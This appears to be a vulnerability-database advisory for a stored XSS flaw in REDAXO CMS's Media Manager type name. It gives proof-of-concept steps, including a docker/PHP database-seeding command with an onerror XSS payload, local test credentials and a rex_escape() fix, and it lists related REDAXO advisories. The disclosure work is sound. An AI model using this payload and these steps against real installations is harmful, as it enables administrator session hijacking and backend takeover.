Vulnerability GHSA-mf2p-wjp4-99pq

Medium Risk
MEDIUM RISK
CVSS Score: 4.8
Score Range: 4.0–6.9
Medium severity vulnerabilities (CVSS 4.0–6.9). Important issues that meaningfully reduce security confidence.
4 days ago
September 23, 2026 at 02:04 PM UTC
REDAXO: Stored XSS via Unescaped Media Manager Type Name in `mediaIsInUse()`
5.10.0 - 5.10.1 and 5.11.0 - 5.11.2 and 5.12.0 - 5.12.1 and 5.13.0 - 5.13.3 and 5.14.0 - 5.14.3 and 5.15.0 - 5.15.1 and 5.16.0 - 5.20.2 and 5.21.0 - 5.21.1
5.10.0 - 5.10.1 and 5.11.0 - 5.11.2 and 5.12.0 - 5.12.1 and 5.13.0 - 5.13.3 and 5.14.0 - 5.14.3 and 5.15.0 - 5.15.1 and 5.16.0 - 5.20.2 and 5.21.0 - 5.21.1

Summary

REDAXO: Stored XSS via Unescaped Media Manager Type Name in `mediaIsInUse()`

Details

Summary

A stored cross-site scripting (XSS) vulnerability exists in REDAXO CMS 5.x. When an administrator attempts to delete a media file that is referenced by a Media Manager effect, the warning message rendered in the backend includes the type's name field without HTML escaping. An attacker with access to the Media Manager addon can store an XSS payload as a type name; the payload executes in the browser of any administrator who subsequently tries to delete a media file linked to that type's effects. This can lead to session hijacking and full backend account takeover.

PoC

image

Test environment: REDAXO 5.x running at http://localhost/ Account required: Any REDAXO backend administrator Test credentials: username admin / password Admin12345!

Step 1 — Seed test data directly into the database (single CMD command)

docker exec -i 34--core-5x-redaxo-1 php -r "$p=new PDO('mysql:host=db;dbname=redaxo','redaxo','redaxo');$p->exec(\"INSERT IGNORE INTO rex_media(category_id,attributes,filetype,filename,originalname,filesize,width,height,title,createdate,createuser,updatedate,updateuser) VALUES(0,'','image/jpeg','xss_test.jpg','xss_test.jpg',284,1,1,'XSS Test',NOW(),'admin',NOW(),'admin')\");$tid=$p->query(\"SELECT id FROM rex_media_manager_type WHERE name='<img src=x onerror=alert(document.domain)>'\")->fetchColumn();if(!$tid){$p->prepare(\"INSERT INTO rex_media_manager_type(status,name,description,createdate,createuser,updatedate,updateuser) VALUES(1,?,'poc',NOW(),'admin',NOW(),'admin')\")->execute(['<img src=x onerror=alert(document.domain)>']);$tid=$p->lastInsertId();}$p->prepare(\"INSERT IGNORE INTO rex_media_manager_type_effect(type_id,effect,parameters,priority,createdate,createuser,updatedate,updateuser) VALUES(?,'watermark',?,1,NOW(),'admin',NOW(),'admin')\")->execute([$tid,json_encode(['rex_effect_watermark'=>['watermark_image'=>'xss_test.jpg']])]);echo \"OK type_id=$tid\n\";"

Step 2 — Place a 1×1 JPEG in the media directory

docker exec 34--core-5x-redaxo-1 sh -c "printf '\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00\xff\xdb\x00C\x00\x08\x06\x06\x07\x06\x05\x08\x07\x07\x07\t\t\x08\n\x0c\x14\r\x0c\x0b\x0b\x0c\x19\x12\x13\x0f\x14\x1d\x1a\x1f\x1e\x1d\x1a\x1c\x1c $.\' \",#\x1c\x1c(7),01444\x1f\x27=82<.342\x1e>\x1b\x1b123\x1e4\x1c\x1f\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x1f\x00\x00\x01\x05\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\t\n\x0b\xff\xda\x00\x08\x01\x01\x00\x00?\x00\xf5\x00\xff\xd9' > /var/www/html/media/xss_test.jpg"

Step 3 — Login to the backend

Open a browser and navigate to:

http://localhost/redaxo/index.php

Login with: admin / Admin12345!

Step 4 — Trigger the XSS

Navigate to the media file detail page:

http://localhost/redaxo/index.php?page=mediapool/media&file_id=1

Click the Delete button. REDAXO checks whether the file is in use, finds the Watermark effect whose parameters JSON references xss_test.jpg, and renders the type name in the warning HTML without escaping.

Result: The browser executes <img src=x onerror=alert(document.domain)> and an alert dialog showing the current domain appears immediately.

Fix

Apply rex_escape() to the type name before concatenating it into the HTML anchor:

// media_manager.php — apply rex_escape() to the name value
$message = '<a href="javascript:openPage(\'' . rex_url::backendPage(...) . '\')">'
    . rex_i18n::msg('media_manager') . ' '
    . rex_i18n::msg('media_manager_effect_name') . ': '
    . rex_escape((string) $sql->getValue('name'))   // ← ADD rex_escape()
    . '</a>';

Related Vulnerabilities

Other vulnerabilities affecting the same packages

Medium Risk
3 days ago
REDAXO: Unwhitelisted ORDER BY Column in rex_list Allows Authenticated Column Enumeration
5.10.0 - 5.10.1 and 5.11.0 - 5.11.2 and 5.12.0 - 5.12.1 and 5.13.0 - 5.13.3 and 5.14.0 - 5.14.3 and 5.15.0 - 5.15.1 and 5.16.0 - 5.20.2 and 5.21.0 - 5.21.1 GHSA-4f5f-j737-pm58
5.10.0 - 5.10.1 and 5.11.0 - 5.11.2 and 5.12.0 - 5.12.1 and 5.13.0 - 5.13.3 and 5.14.0 - 5.14.3 and 5.15.0 - 5.15.1 and 5.16.0 - 5.20.2 and 5.21.0 - 5.21.1 GHSA-4f5f-j737-pm58
Medium Risk
4 days ago
REDAXO: Missing CSRF Protection on Package Update Action Allows Forced Addon Updates
5.10.0 - 5.10.1 and 5.11.0 - 5.11.2 and 5.12.0 - 5.12.1 and 5.13.0 - 5.13.3 and 5.14.0 - 5.14.3 and 5.15.0 - 5.15.1 and 5.16.0 - 5.20.2 and 5.21.0 - 5.21.1 GHSA-m8r3-22v6-g877
5.10.0 - 5.10.1 and 5.11.0 - 5.11.2 and 5.12.0 - 5.12.1 and 5.13.0 - 5.13.3 and 5.14.0 - 5.14.3 and 5.15.0 - 5.15.1 and 5.16.0 - 5.20.2 and 5.21.0 - 5.21.1 GHSA-m8r3-22v6-g877
Medium Risk
4 days ago
REDAXO: Stored XSS in Mediapool Sync Page via Unescaped Filesystem Filenames
5.10.0 - 5.10.1 and 5.11.0 - 5.11.2 and 5.12.0 - 5.12.1 and 5.13.0 - 5.13.3 and 5.14.0 - 5.14.3 and 5.15.0 - 5.15.1 and 5.16.0 - 5.20.2 and 5.21.0 - 5.21.1 GHSA-w998-qmw9-mf4m
5.10.0 - 5.10.1 and 5.11.0 - 5.11.2 and 5.12.0 - 5.12.1 and 5.13.0 - 5.13.3 and 5.14.0 - 5.14.3 and 5.15.0 - 5.15.1 and 5.16.0 - 5.20.2 and 5.21.0 - 5.21.1 GHSA-w998-qmw9-mf4m
High Risk
1 month ago
Redaxo has a Mediapool isAllowedExtension bypass via multi-segment filename that leads to authenticated RCE on Apache mod_php multi-extension handlers
5.18.2 - 5.20.2 and 5.21.0 GHSA-98pp-vccm-qm25
5.18.2 - 5.20.2 and 5.21.0 GHSA-98pp-vccm-qm25
Low Risk
5 months ago
REDAXO has reflected XSS backend packages API via function parameter (CSRF token required)
5.10.0 - 5.10.1 and 5.11.0 - 5.11.2 and 5.12.0 - 5.12.1 and 5.13.0 - 5.13.3 and 5.14.0 - 5.14.3 and 5.15.0 - 5.15.1 and 5.16.0 - 5.20.2 and 5.21.0 GHSA-xq4j-g85q-wf97
5.10.0 - 5.10.1 and 5.11.0 - 5.11.2 and 5.12.0 - 5.12.1 and 5.13.0 - 5.13.3 and 5.14.0 - 5.14.3 and 5.15.0 - 5.15.1 and 5.16.0 - 5.20.2 and 5.21.0 GHSA-xq4j-g85q-wf97
View all vulnerabilities for these packages

Impacted packages

Timeline

Published
4 days ago
September 23, 2026 at 02:04 PM UTC
Fixed (5.21.2)
3 months ago
June 29, 2026 at 09:41 AM UTC
Last Modified
4 days ago
September 23, 2026 at 02:15 PM UTC